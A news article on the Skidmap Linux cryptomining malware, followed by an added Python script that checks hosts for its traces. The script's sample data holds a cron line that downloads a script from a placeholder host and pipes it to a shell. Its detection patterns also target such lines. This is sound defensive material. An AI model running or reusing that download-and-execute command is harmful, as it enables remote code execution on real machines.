As security experts do their best to curb the rise in cryptojacking campaigns, hackers are devising new methods to steal from people. According to a detailed post by two threat analysts on Trend Micro's security intelligence blog, there is a new Linux malware called Skidmap. Per Jakub Urbanec and Remillano II, Skidmap hides its cryptocurrency mining operations from its victim by loading malicious kernel modules. That is not all, however.
Skidmap Masks its Crypto Mining Activities
After finding its target, the malware installs itself via crontab and proceeds to download and execute the main binary. It then reconfigures and disables the SELinux policy. After all that, Skidmap creates a backdoor while masking its mining activity with a rootkit. All of this is done without the user's consent, giving the hackers the upper hand. With a backdoor on the victim's machine, the hackers can access any user account and do anything they want. The analysts explained further:
The malware also sets up its backdoor to the victim's machine by replacing the pam_unix.so file on the operating system with its own version. Replacement of the pam_unix.so file means a specific password has been set; hence, the hackers can log in to any user account without interruption.
Apart from the above, per the analysts' explanation, Skidmap is highly advanced and comes with more than one access mode. These different access modes let it regain access to an infected computer without detection after the machine has been cleaned, which allows the attackers to reinfect it. Furthermore, it uses other techniques to ensure its activities remain undetected on the infected machine.
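The infection chain described above (a crontab entry that downloads and executes a payload, SELinux taken out of enforcing mode, rootkit kernel modules, and a replaced pam_unix.so) leaves traces an administrator can look for. The following is an added defender-side example, not code from the Trend Micro write-up or from the malware itself. Each check is a pure function over command output so it can be tested with constructed input; main() gathers the real output on a Linux host. The cron patterns, the rpm -V parsing (RPM-based distributions only) and the module-tree path are assumptions of this example, not values taken from the page.

```python
"""Host checks for Skidmap-style indicators (added example, not Trend Micro's code)."""
import os
import re
import shutil
import subprocess

# Assumption: a cron line that both fetches from the network and executes the
# result in the same command is worth a look. Tune the patterns for your fleet.
FETCH_RE = re.compile(r"\b(curl|wget)\b")
EXEC_RE = re.compile(r"\|\s*(ba)?sh\b|;\s*(ba)?sh\b|chmod\s+\+x|\bpython[23]?\s+-c")

# `rpm -V` prints a 9-character attribute string, an optional file-type letter,
# then the path. A '5' in the attribute string means the file digest changed.
RPM_V_RE = re.compile(r"^([S.M5DLUGTP?]{9})\s+(?:[cdglr]\s+)?(\S+)$")

# Constructed sample input, used by demo(); none of it comes from a real host.
SAMPLE_CRONTAB = (
    "*/1 * * * * curl -fsSL http://example.invalid/x.sh | sh\n"
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
)
SAMPLE_RPM_V = (
    "S.5....T.    /usr/lib64/security/pam_unix.so\n"
    ".......T.    /etc/pam.d/other\n"
)


def suspicious_cron_entries(crontab_text):
    """Return crontab lines that download something and execute it in one go."""
    hits = []
    for line in crontab_text.splitlines():
        body = line.strip()
        if not body or body.startswith("#"):
            continue
        if FETCH_RE.search(body) and EXEC_RE.search(body):
            hits.append(body)
    return hits


def selinux_weakened(getenforce_output, config_text=""):
    """True if SELinux is not enforcing now, or is configured not to enforce on boot."""
    if getenforce_output.strip().lower() in ("permissive", "disabled"):
        return True
    for line in config_text.splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "SELINUX" and value.strip().lower() != "enforcing":
            return True
    return False


def foreign_kernel_modules(lsmod_output, known_modules):
    """Loaded module names that have no .ko file in the running kernel's module tree."""
    loaded = [l.split()[0] for l in lsmod_output.splitlines()[1:] if l.strip()]
    return sorted(m for m in loaded if m not in known_modules)


def digest_changed_files(rpm_verify_output, name_filter="pam_unix.so"):
    """Paths from `rpm -V` output whose digest no longer matches the package."""
    changed = []
    for line in rpm_verify_output.splitlines():
        m = RPM_V_RE.match(line.strip())
        if m and "5" in m.group(1) and name_filter in m.group(2):
            changed.append(m.group(2))
    return changed


def run(cmd):
    """Run a command and return its stdout, or '' when the tool is not installed."""
    if shutil.which(cmd[0]) is None:
        return ""
    return subprocess.run(cmd, capture_output=True, text=True).stdout


def demo():
    """Run the checks over the constructed samples; returns the findings."""
    return {
        "cron": suspicious_cron_entries(SAMPLE_CRONTAB),
        "selinux": selinux_weakened("Permissive\n"),
        "pam": digest_changed_files(SAMPLE_RPM_V),
    }


def main():
    """Collect live data from this host and print anything the checks flag."""
    findings = []
    cron_text = run(["crontab", "-l"])
    if os.path.exists("/etc/crontab"):
        cron_text += "\n" + open("/etc/crontab").read()
    findings += ["cron: " + e for e in suspicious_cron_entries(cron_text)]
    config = open("/etc/selinux/config").read() if os.path.exists("/etc/selinux/config") else ""
    if selinux_weakened(run(["getenforce"]), config):
        findings.append("selinux: not enforcing")
    release = os.uname().release
    known = set()  # module names from /lib/modules/<release>, hyphens normalised
    for _, _, files in os.walk("/lib/modules/" + release):
        for f in files:
            if ".ko" in f:
                known.add(f.split(".ko")[0].replace("-", "_"))
    for m in foreign_kernel_modules(run(["lsmod"]), known):
        findings.append("kernel module not in /lib/modules/%s: %s" % (release, m))
    for path in digest_changed_files(run(["rpm", "-V", "pam"])):
        findings.append("package digest mismatch: " + path)
    print("\n".join(findings) if findings else "no findings")
    return findings


if __name__ == "__main__":
    main()
```

On Debian-based hosts the pam_unix.so check would use `debsums` or `dpkg --verify` instead of `rpm -V`; the parsing function would need a matching format. A rootkit that hides its own module from lsmod will defeat the module check, so the results are a starting point for triage, not a clean bill of health.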
The analysts finished their post by urging system administrators to always be alert and on the lookout for malicious files, and to keep their systems updated. In addition to guiding administrators, the analysts pointed out that their ServerProtect for Linux and Trend Micro Network Defense products are the best at protecting Linux systems. These are high-end security products that detect malicious URLs and files while protecting users from cryptojacking malware such as Skidmap. Besides these, there are various other Trend Micro security products that can help secure systems.